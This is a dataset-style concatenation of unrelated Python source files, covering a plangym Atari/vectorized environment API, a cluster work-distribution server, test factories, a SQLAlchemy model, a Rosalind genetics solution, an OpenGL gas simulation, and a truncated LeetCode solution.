possible_to_win: It is possible to finish the Atari game without
getting a terminal state that is not out of bounds
or doest not involve losing a life.
wrappers: Wrappers that will be applied to the underlying OpenAI env.
Every element of the iterable can be either a :class:`gym.Wrapper`
or a tuple containing ``(gym.Wrapper, kwargs)``.
"""
self._remove_time_limit = remove_time_limit
self.possible_to_win = possible_to_win
self._obs_type = obs_type
self._mode = mode
self._difficulty = difficulty
self._repeat_action_probability = repeat_action_probability
self._full_action_space = full_action_space
self._render_mode = render_mode
super(VideogameEnvironment, self).__init__(
name=name,
frameskip=frameskip,
episodic_live=episodic_live,
autoreset=autoreset,
wrappers=wrappers,
delay_init=delay_init,
)
@property
def obs_type(self) -> str:
"""Return the type of observation returned by the environment."""
return self._obs_type
@property
def mode(self) -> int:
"""Return the selected game mode for the current environment."""
return self._mode
@property
def difficulty(self) -> int:
"""Return the selected difficulty for the current environment."""
return self._difficulty
@property
def repeat_action_probability(self) -> float:
"""Probability of repeating the same action after input."""
return self._repeat_action_probability
@property
def full_action_space(self) -> bool:
"""If True the action space correspond to all possible actions in the Atari emulator."""
return self._full_action_space
@property
def render_mode(self) -> str:
"""Return how the game will be rendered. Values: None | human | rgb_array."""
return self._render_mode
@property
def has_time_limit(self) -> bool:
"""Return True if the Environment can only be stepped for a limited number of times."""
return self._remove_time_limit
@property
def n_actions(self) -> int:
"""Return the number of actions available."""
return self.gym_env.action_space.n
def clone(self, **kwargs) -> "VideogameEnvironment":
"""Return a copy of the environment."""
params = dict(
name=self.name,
frameskip=self.frameskip,
wrappers=self._wrappers,
episodic_live=self.episodic_life,
autoreset=self.autoreset,
delay_init=self.delay_init,
possible_to_win=self.possible_to_win,
clone_seeds=self.clone_seeds,
mode=self.mode,
difficulty=self.difficulty,
obs_type=self.obs_type,
repeat_action_probability=self.repeat_action_probability,
full_action_space=self.full_action_space,
render_mode=self.render_mode,
remove_time_limit=self._remove_time_limit,
)
params.update(**kwargs)
return self.__class__(**params)
def get_ram(self) -> np.ndarray:
"""Return the ram of the emulator as a numpy array."""
raise NotImplementedError()
class VectorizedEnvironment(BaseEnvironment, ABC):
"""
Base class that defines the API for working with vectorized environments.
A vectorized environment allows to step several copies of the environment in parallel
when calling ``step_batch``.
It creates a local copy of the environment that is the target of all the other
methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment`
acts as a wrapper of an environment initialized with the provided parameters when calling
__init__.
"""
def __init__(
self,
env_class,
name: str,
frameskip: int = 1,
autoreset: bool = True,
delay_init: bool = False,
n_workers: int = 8,
**kwargs,
):
"""
Initialize a :class:`VectorizedEnvironment`.
Args:
env_class: Class of the environment to be wrapped.
name: Name of the environment.
frameskip: Number of times ``step`` will me called with the same action.
autoreset: Ignored. Always set to True. Automatically reset the environment
when the OpenAI environment returns ``end = True``.
delay_init: If ``True`` do not initialize the ``gym.Environment`` \
and wait for ``init_env`` to be called later.
env_callable: Callable that returns an instance of the environment \
that will be parallelized.
n_workers: Number of workers that will be used to step the env.
**kwargs: Additional keyword arguments passed to env_class.__init__.
"""
self._n_workers = n_workers
self._env_class = env_class
self._env_kwargs = kwargs
self._plangym_env = None
self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False
self.RETURNS_GYM_TUPLE = (
env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True
)
self.STATE_IS_ARRAY = (
env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True
)
super(VectorizedEnvironment, self).__init__(
name=name,
frameskip=frameskip,
autoreset=autoreset,
delay_init=delay_init,
)
@property
def n_workers(self) -> int:
"""Return the number of parallel processes that run ``step_batch`` in parallel."""
return self._n_workers
@property
def plangym_env(self) -> BaseEnvironment:
"""Environment that is wrapped by the current instance."""
return self._plangym_env
@property
def obs_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the observations returned by the Environment."""
return self.plangym_env.obs_shape
@property
def action_shape(self) -> Tuple[int]:
"""Tuple containing the shape of the actions applied to the Environment."""
return self.plangym_env.action_shape
@property
def gym_env(self):
"""Return the instance of the environment that is being wrapped by plangym."""
try:
return self.plangym_env.gym_env
except AttributeError:
return
def __getattr__(self, item):
"""Forward attributes to the wrapped environment."""
return getattr(self.plangym_env, item)
@staticmethod
def split_similar_chunks(
vector: Union[list, numpy.ndarray],
n_chunks: int,
) -> Generator[Union[list, numpy.ndarray], None, None]:
"""
Split an indexable object into similar chunks.
Args:
vector: Target indexable object to be split.
n_chunks: Number of similar chunks.
Returns:
Generator that returns the chunks created after splitting the target object.
"""
chunk_size = int(numpy.ceil(len(vector) / n_chunks))
for i in range(0, len(vector), chunk_size):
yield vector[i : i + chunk_size]
@classmethod
def batch_step_data(cls, actions, states, dt, batch_size):
"""Make batches of step data to distribute across workers."""
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
dt = dt if isinstance(dt, numpy.ndarray) else numpy.ones(len(states), dtype=int) * dt
states_chunks = cls.split_similar_chunks(states, n_chunks=batch_size)
actions_chunks = cls.split_similar_chunks(actions, n_chunks=batch_size)
dt_chunks = cls.split_similar_chunks(dt, n_chunks=batch_size)
return states_chunks, actions_chunks, dt_chunks
def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]:
"""Return a callable that initializes the environment that is being vectorized."""
def create_env_callable(env_class, **env_kwargs):
def _inner(**inner_kwargs):
env_kwargs.update(inner_kwargs)
return env_class(**env_kwargs)
return _inner
callable_kwargs = dict(
env_class=self._env_class,
name=self.name,
frameskip=self.frameskip,
delay_init=self._env_class.SINGLETON,
**self._env_kwargs,
)
callable_kwargs.update(kwargs)
return create_env_callable(**callable_kwargs)
def init_env(self) -> None:
"""Initialize the target environment with the parameters provided at __init__."""
self._plangym_env: BaseEnvironment = self.create_env_callable()()
self._plangym_env.init_env()
def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1):
"""
Step the environment applying a given action from an arbitrary state.
If is not provided the signature matches the one from OpenAI gym. It allows \
to apply arbitrary boundary conditions to define custom end states in case \
the env was initialized with a "CustomDeath' object.
Args:
action: Array containing the action to be applied.
state: State to be set before stepping the environment.
dt: Consecutive number of times to apply the given action.
Returns:
if states is None returns `(observs, rewards, ends, infos) `else \
`(new_states, observs, rewards, ends, infos)`.
"""
return self.plangym_env.step(action=action, state=state, dt=dt)
def reset(self, return_state: bool = True):
"""
Reset the environment and returns the first observation, or the first \
(state, obs) tuple.
Args:
return_state: If true return a also the initial state of the env.
Returns:
Observation of the environment if `return_state` is False. Otherwise,
return (state, obs) after reset.
"""
state, obs = self.plangym_env.reset(return_state=True)
self.sync_states(state)
return (state, obs) if return_state else obs
def get_state(self):
"""
Recover the internal state of the simulation.
An state completely describes the Environment at a given moment.
Returns:
State of the simulation.
"""
return self.plangym_env.get_state()
def set_state(self, state):
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
"""
self.plangym_env.set_state(state)
self.sync_states(state)
def render(self, mode="human"):
"""Render the environment using OpenGL. This wraps the OpenAI render method."""
return self.plangym_env.render(mode)
def get_image(self) -> np.ndarray:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return self.plangym_env.get_image()
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples\
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
If state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
return self.plangym_env.step_with_dt(action=action, dt=dt)
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
return self.plangym_env.sample_action()
def sync_states(self, state: None):
"""
Synchronize the workers' states with the state of ``self.gym_env``.
Set all the states of the different workers of the internal :class:`BatchEnv`\
to the same state as the internal :class:`Environment` used to apply the\
non-vectorized steps.
"""
raise NotImplementedError()
def step_batch(
self,
actions: numpy.ndarray,
states: numpy.ndarray = None,
dt: [numpy.ndarray, int] = 1,
):
"""
Vectorized version of the ``step`` method.
It allows to step a vector of states and actions. The signature and \
behaviour is the same as ``step``, but taking a list of states, actions \
and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)`` else \
``(new_states, observs, rewards, ends, infos)``
"""
raise NotImplementedError()
def clone(self, **kwargs) -> "BaseEnvironment":
"""Return a copy of the environment."""
self_kwargs = dict(
name=self.name,
frameskip=self.frameskip,
delay_init=self.delay_init,
env_class=self._env_class,
n_workers=self.n_workers,
**self._env_kwargs,
)
self_kwargs.update(kwargs)
env = self.__class__(**self_kwargs)
return env
| 36.574635
| 99
| 0.613232
| 3,925
| 32,588
| 4.952866
| 0.102166
| 0.049691
| 0.022222
| 0.00823
| 0.494136
| 0.434465
| 0.410185
| 0.376029
| 0.356584
| 0.34784
| 0
| 0.001401
| 0.29919
| 32,588
| 890
| 100
| 36.61573
| 0.849812
| 0.419878
| 0
| 0.354839
| 0
| 0
| 0.016653
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.172811
| false
| 0.006912
| 0.016129
| 0
| 0.327189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f890b9328d6983928b109fecc583fe7148f59dc
| 6,426
|
py
|
Python
|
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
L2.py
|
coka28/AlignmentCluster
|
11a4e5fc578258bd3a2181a13bdaa60346eca8da
|
[
"MIT"
] | null | null | null |
# Layer 2 server script
# project worker
'''-.
+#_pü'-.....
ö*+...:(loop):..............................................
m}°: \
€>!: 1. register clients \
&w^: 2. distribute WLs and add them to pending \
j/6: 3. move results to results dir \
@²%: 4. remove timed-out from pending and re-open them :§
#ß$: 5. check if done /
6@y: 6. backup and call htmlUpdate /
µ<§: /
%$":......................................................../
%&"$%!§.-´´´´
€$"!.-´
'''
import sys, os, pickle, shutil, htmlTool
from time import time, sleep
os.chdir(os.path.expanduser("~"))
project = sys.argv[-1]
projDir = f'apps/aligner/projects/{project}'
clientsDir = f'{projDir}/clients'
regDir = f'{projDir}/registrations'
backupDir = f'{projDir}/backup'
resDir = f'{projDir}/results'
def registerClient(ID):
print(f'{project}: \tregistering new client with ID {ID}')
os.mkdir(f'{clientsDir}/{ID}')
os.mkdir(f'{clientsDir}/{ID}/res')
os.mkdir(f'{clientsDir}/{ID}/res/done')
with open(f'{clientsDir}/{ID}/res/done/done','wb') as doneFile:
pickle.dump(0,doneFile)
def passWLs():
global openWLs, pendingWLs
clients = os.listdir(clientsDir)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/inactive'):
clients.remove(n)
for n in clients:
if os.path.exists(f'{clientsDir}/{n}/WL'):
if time()-os.path.getmtime(f'{clientsDir}/{n}/WL') > 3600:
print(f'{project}: \tclient {n} did not retrieve their workload... reassigning and setting to inactive')
wl = pickle.load(open(f'{clientsDir}/{n}/WL','rb'))
os.remove(f'{clientsDir}/{n}/WL')
for w in wl:
if w in pendingWLs:
i = pendingWLs.index(w)
del(pendingWLs[i])
del(assignmentTimes[i])
openWLs.insert(0,w)
with open(f'{clientsDir}/{n}/inactive','w') as tmp: pass
else:
tmp = min(min(128, int(len(openWLs)/len(clients))*4+1),len(openWLs))
if tmp > 0: print(f'{project}: \tassigned {tmp} workloads to client {n}')
wl = [openWLs.pop(0) for i in range(tmp)]
with open(f'{clientsDir}/{n}/WL_tmp','wb') as tmp:
pickle.dump(wl,tmp)
for i in wl:
pendingWLs.append(i)
assignmentTimes.append(time())
os.rename(f'{clientsDir}/{n}/WL_tmp',f'{clientsDir}/{n}/WL')
def moveResults():
clientDirs = os.listdir(clientsDir)
stored = 0
for n in clientDirs:
resFiles = os.listdir(f'{clientsDir}/{n}/res')
resFiles.remove('done')
with open(f'{clientsDir}/{n}/res/done/done','rb') as doneFile:
doneWLs = pickle.load(doneFile)
for m in resFiles:
if os.path.getsize(f'{clientsDir}/{n}/res/'+m) == 0 and time()-os.path.getmtime(f'{clientsDir}/{n}/res/'+m)<60:
pass
else:
resIndex = int(m[m.find('.')+1:])
if resIndex in pendingWLs:
i = pendingWLs.index(resIndex)
alList = open(f'{clientsDir}/{n}/res/{m}','r').read().split('\n\n')
alList = [i for i in alList if i!='']
alignments = []
for al in alList:
tmp = al.split('\n')
tmp = [tuple(int(k) for k in tmp[j].split(';') if tmp[j]!='')
for j in range(len(tmp))]
alignments.append(tmp)
doneWLs += 1
with open(resDir+'/'+str(resIndex),'wb') as tmp:
pickle.dump(alignments,tmp)
os.remove(f'{clientsDir}/{n}/res/{m}')
# shutil.move(f'{clientsDir}/{n}/res/{m}',f'{resDir}/{m}')
stored += 1
del(pendingWLs[i])
del(assignmentTimes[i])
else:
os.remove(f'{clientsDir}/{n}/res/{m}')
with open(f'{clientsDir}/{n}/res/done/done','wb') as doneFile:
pickle.dump(doneWLs,doneFile)
if stored > 0: print(f'{project}: \tstored {stored} alignment parts in /results')
def reopen():
reNr = 0
for i in range(len(pendingWLs)-1,-1,-1):
if time()-assignmentTimes[i] > 1800:
openWLs.insert(0,pendingWLs[i])
del(pendingWLs[i])
del(assignmentTimes[i])
reNr += 1
if reNr > 0: print(f'{project}: \treopened {reNr} timed-out workloads')
def checkDone():
if len(pendingWLs) + len(openWLs) == 0:
print(f'{project}: \tproject finished')
return True
else: return False
def backup():
with open(f'{backupDir}/openWLs','w+b') as tmp:
pickle.dump(openWLs,tmp)
with open(f'{backupDir}/pendingWLs','w+b') as tmp:
pickle.dump(pendingWLs,tmp)
with open(f'{backupDir}/assignmentTimes','w+b') as tmp:
pickle.dump(assignmentTimes,tmp)
print(f'{project}: \tcreated backup')
# load from backup
with open(f'{backupDir}/openWLs','rb') as tmp:
openWLs = pickle.load(tmp)
with open(f'{backupDir}/pendingWLs','rb') as tmp:
pendingWLs = pickle.load(tmp)
with open(f'{backupDir}/assignmentTimes','rb') as tmp:
assignmentTimes = pickle.load(tmp)
print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})')
backup_counter = 0
done = False
while not done:
# 1.
for ID in os.listdir(regDir):
registerClient(ID)
os.remove(f'{regDir}/{ID}')
# 2.
passWLs()
# 3.
moveResults()
# 4.
reopen()
# 5.
if checkDone(): done = True
# 6.
if backup_counter == 100 or done:
backup()
try: htmlTool.update()
except: pass
backup_counter = 0
if done:
os.rename(projDir,f'{projDir}__done__')
backup_counter += 1
sleep(1.74)
| 36.931034
| 124
| 0.495331
| 755
| 6,426
| 4.215894
| 0.223841
| 0.076029
| 0.067861
| 0.042413
| 0.325479
| 0.231543
| 0.114672
| 0.061263
| 0.024505
| 0.024505
| 0
| 0.01384
| 0.336601
| 6,426
| 173
| 125
| 37.144509
| 0.730237
| 0.123561
| 0
| 0.117188
| 0
| 0.007813
| 0.228887
| 0.091996
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046875
| false
| 0.039063
| 0.015625
| 0
| 0.070313
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f8a8dc4b802b22d26a8494296192bb50d7f2d9a
| 2,677
|
py
|
Python
|
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
test/factory/schedule_factory.py
|
choonho/statistics
|
31fbae2d0772a2e8b717ac12c8de9edd9d8f1734
|
[
"Apache-2.0"
] | null | null | null |
import factory
from spaceone.core import utils
from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
class ScheduledFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Scheduled
cron = '*/5 * * * *'
interval = 5
minutes = [0, 10, 20, 30, 40, 50]
hours = [0, 6, 12, 18]
class JoinQueryFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = JoinQuery
keys = ['project_id']
type = 'LEFT'
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'inventory.Server'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}],
'fields': [{
'operator': 'count',
'name': 'server_count'
}]
}
}
}
class FormulaFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Formula
name = factory.LazyAttribute(lambda o: utils.random_string())
formula = 'a + (b / c)'
class QueryOptionFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = QueryOption
data_source_id = factory.LazyAttribute(lambda o: utils.generate_id('ds'))
resource_type = 'identity.Project'
query = {
'aggregate': {
'group': {
'keys': [{
'key': 'project_id',
'name': 'project_id'
}, {
'key': 'name',
'name': 'project_name'
}, {
'key': 'project_group.name',
'name': 'project_group_name'
}],
}
},
'sort': {
'name': 'resource_count',
'desc': True
},
'page': {
'limit': 5
}
}
join = factory.List([factory.SubFactory(JoinQueryFactory)])
formulas = factory.List([factory.SubFactory(FormulaFactory)])
class ScheduleFactory(factory.mongoengine.MongoEngineFactory):
class Meta:
model = Schedule
schedule_id = factory.LazyAttribute(lambda o: utils.generate_id('schedule'))
topic = factory.LazyAttribute(lambda o: utils.random_string())
state = 'ENABLED'
options = factory.SubFactory(QueryOptionFactory)
schedule = factory.SubFactory(ScheduledFactory)
tags = {
'key': 'value'
}
domain_id = utils.generate_id('domain')
created_at = factory.Faker('date_time')
last_scheduled_at = None
| 26.245098
| 105
| 0.548001
| 234
| 2,677
| 6.141026
| 0.376068
| 0.06263
| 0.125261
| 0.142658
| 0.427279
| 0.427279
| 0.253306
| 0.192067
| 0.161447
| 0.161447
| 0
| 0.011186
| 0.332088
| 2,677
| 101
| 106
| 26.504951
| 0.792506
| 0
| 0
| 0.2875
| 0
| 0
| 0.125514
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0375
| 0
| 0.475
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9164c1cc7e9494a573895e93fd39680b8520f6
| 1,324
|
py
|
Python
|
ymir/backend/src/ymir_app/app/models/iteration.py
|
Zhang-SJ930104/ymir
|
dd6481be6f229ade4cf8fba64ef44a15357430c4
|
[
"Apache-2.0"
] | null | null | null |
ymir/backend/src/ymir_app/app/models/iteration.py
|
Zhang-SJ930104/ymir
|
dd6481be6f229ade4cf8fba64ef44a15357430c4
|
[
"Apache-2.0"
] | 1
|
2022-01-18T09:28:29.000Z
|
2022-01-18T09:28:29.000Z
|
ymir/backend/src/ymir_app/app/models/iteration.py
|
Aryalfrat/ymir
|
d4617ed00ef67a77ab4e1944763f608bface4be6
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime
from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String
from app.config import settings
from app.db.base_class import Base
from app.models.task import Task # noqa
class Iteration(Base):
__tablename__ = "iteration"
id = Column(Integer, primary_key=True, index=True, autoincrement=True)
description = Column(String(settings.STRING_LEN_LIMIT))
iteration_round = Column(Integer, index=True, nullable=False)
current_stage = Column(SmallInteger, index=True, default=0, nullable=False)
previous_iteration = Column(Integer, index=True, default=0, nullable=False)
mining_input_dataset_id = Column(Integer)
mining_output_dataset_id = Column(Integer)
label_output_dataset_id = Column(Integer)
training_input_dataset_id = Column(Integer)
training_output_model_id = Column(Integer)
testing_dataset_id = Column(Integer)
user_id = Column(Integer, index=True, nullable=False)
project_id = Column(Integer, index=True, nullable=False)
is_deleted = Column(Boolean, default=False, nullable=False)
create_datetime = Column(DateTime, default=datetime.utcnow, nullable=False)
update_datetime = Column(
DateTime,
default=datetime.utcnow,
onupdate=datetime.utcnow,
nullable=False,
)
| 36.777778
| 79
| 0.749245
| 162
| 1,324
| 5.919753
| 0.32716
| 0.149114
| 0.140772
| 0.114703
| 0.397289
| 0.265902
| 0.077164
| 0
| 0
| 0
| 0
| 0.001805
| 0.163142
| 1,324
| 35
| 80
| 37.828571
| 0.863718
| 0.003021
| 0
| 0
| 0
| 0
| 0.006829
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.178571
| 0
| 0.821429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f94b482c019a016c621810412b2112d18748236
| 958
|
py
|
Python
|
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | 1
|
2015-03-25T22:35:52.000Z
|
2015-03-25T22:35:52.000Z
|
Rosalind/iprb.py
|
yuriyshapovalov/Prototypes
|
1fc4af4434440a8f59a4bcb486e79fd53d199a7d
|
[
"Apache-2.0"
] | null | null | null |
# Mendel's First Law
# http://rosalind.info/problems/iprb/
import sys
import unittest
class iprb:
def main(self, hom_dom, het, hom_rec):
total = hom_dom + het + hom_rec
p_hom_dom = hom_dom / total
p_het = het / total
p_hom_rec = hom_rec / total
prob = 1
prob -= p_hom_rec * ((hom_rec-1)/(total-1))
prob -= 2 * p_hom_rec * (het / (total - 1) * 0.5)
prob -= p_het * ((het - 1) / (total-1)) * 0.25
return prob
class Test(unittest.TestCase):
def setUp(self):
self.hom_dom = 2
self.het = 2
self.hom_dom = 2
self.result = 0.78333
def test_mendel_first_law(self):
self.assertAlmostEqual(
self.result,
self.iprb().main(self.hom_dom, het, hom_rec),
places=5)
if __name__ == '__main__':
hom_dom = int(sys.argv[1])
het = int(sys.argv[2])
hom_rec = int(sys.argv[3])
if hom_dom == 0 or het == 0 or hom_rec == 0:
raise Exception("ERROR: Incorrect parameters")
result = iprb().main(hom_dom, het, hom_rec)
print(result)
| 23.365854
| 51
| 0.654489
| 166
| 958
| 3.548193
| 0.289157
| 0.112054
| 0.067912
| 0.081494
| 0.224109
| 0.078098
| 0.078098
| 0
| 0
| 0
| 0
| 0.036269
| 0.194154
| 958
| 41
| 52
| 23.365854
| 0.726684
| 0.056367
| 0
| 0.0625
| 0
| 0
| 0.038803
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.09375
| false
| 0
| 0.0625
| 0
| 0.25
| 0.03125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f96125b242a38cf3339aa9cccbeb3af52c0c4f9
| 3,679
|
py
|
Python
|
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
boltzmann.py
|
jkotrc/2D-Elastic-Gas
|
ee7632518adb03076a684dae48f0fb6f8c44efa3
|
[
"Unlicense"
] | null | null | null |
#MAIN method and graphics
try:
from OpenGL.GL import *
from OpenGL import GLU
import OpenGL.GL.shaders
except:
print("OpenGL wrapper for python not found")
import glfw
import numpy as np
from computation import Computation
class Graphics:
def __init__(self,width,height, computation):
if not glfw.init():
print("GLFW Failed to initialize!")
self.window = glfw.create_window(width, height, "Boltzmann", None, None);
glfw.make_context_current(self.window)
self.windowsizechanged=False
glfw.set_window_size_callback(self.window, self.resizewindow)
self.program = self.loadShaders("vertex.glsl", "fragment.glsl")
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), height)
self.width=width
self.height=height
self.comp = comp
self.points = np.array(self.comp.pos.reshape(-1,order='F'), dtype=np.float32)
self.graphicsinit()
def resizewindow(self,w,h,a):
self.windowsizechanged=True
def graphicsinit(self):
VBO = glGenBuffers(1)
glBindBuffer(GL_ARRAY_BUFFER, VBO)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
position = glGetAttribLocation(self.program, "position")
glVertexAttribPointer(position, 2, GL_FLOAT, GL_FALSE, 0, None)
glEnableVertexAttribArray(position)
glClearColor(0.3, 0.3, 0.3, 1.0)
glEnable(GL_POINT_SMOOTH)
glPointSize(self.comp.size/2)
def render(self):
for i in range (0, self.comp.frameskip):
self.comp.cudastep();
self.points = self.comp.pos.reshape(-1,order='F')
glClear(GL_COLOR_BUFFER_BIT)
glUseProgram(self.program)
glBufferData(GL_ARRAY_BUFFER, self.points.itemsize * self.points.size, self.points, GL_STATIC_DRAW)
glDrawArrays(GL_POINTS, 0, int(self.points.size / 2))
glfw.swap_buffers(self.window)
def mainloop(self):
while not glfw.window_should_close(self.window):
glfw.poll_events()
if self.windowsizechanged == True:
self.width,self.height = glfw.get_framebuffer_size(self.window);
glUseProgram(self.program)
glUniform1i(glGetUniformLocation(self.program, "WIDTH"), self.width)
glUniform1i(glGetUniformLocation(self.program, "HEIGHT"), self.height)
self.windowsizechanged=False
self.render()
glfw.terminate()
def loadShaders(self, vertpath, fragpath):
vertexshader=glCreateShader(GL_VERTEX_SHADER)
fragmentshader=glCreateShader(GL_FRAGMENT_SHADER)
fragfile = open(fragpath, "r")
vertfile = open(vertpath, "r")
fragsource = fragfile.read()
fragfile.close()
vertsource = vertfile.read()
vertfile.close()
shader = OpenGL.GL.shaders.compileProgram(OpenGL.GL.shaders.compileShader(vertsource, GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragsource, GL_FRAGMENT_SHADER))
return shader
if __name__ == "__main__":
#A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512
comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512)
g=Graphics(1000, 1000,comp)
g.mainloop();
| 44.325301
| 141
| 0.651264
| 419
| 3,679
| 5.599045
| 0.353222
| 0.042199
| 0.025575
| 0.071611
| 0.212276
| 0.193521
| 0.148338
| 0.127025
| 0.067349
| 0.067349
| 0
| 0.027628
| 0.242457
| 3,679
| 83
| 142
| 44.325301
| 0.814137
| 0.041044
| 0
| 0.094595
| 0
| 0
| 0.039478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0
| 0.081081
| 0
| 0.189189
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9861c2730925ff3619b6059676dc2a261cbae6
| 827
|
py
|
Python
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 9
|
2020-08-12T10:01:00.000Z
|
2022-01-05T04:37:48.000Z
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 1
|
2021-02-16T10:19:31.000Z
|
2021-02-16T10:19:31.000Z
|
question_bank/lemonade-change/lemonade-change.py
|
yatengLG/leetcode-python
|
5d48aecb578c86d69835368fad3d9cc21961c226
|
[
"Apache-2.0"
] | 4
|
2020-08-12T10:13:31.000Z
|
2021-11-05T01:26:58.000Z
|
# -*- coding: utf-8 -*-
# @Author : LG
"""
执行用时:152 ms, 在所有 Python3 提交中击败了96.83% 的用户
内存消耗:14 MB, 在所有 Python3 提交中击败了12.45% 的用户
解题思路:
见代码注释
"""
class Solution:
def lemonadeChange(self, bills: List[int]) -> bool:
five = ten = 0 # 5元10元初始各0个
for bill in bills:
if bill == 20: # 对于20,有两种找零方式
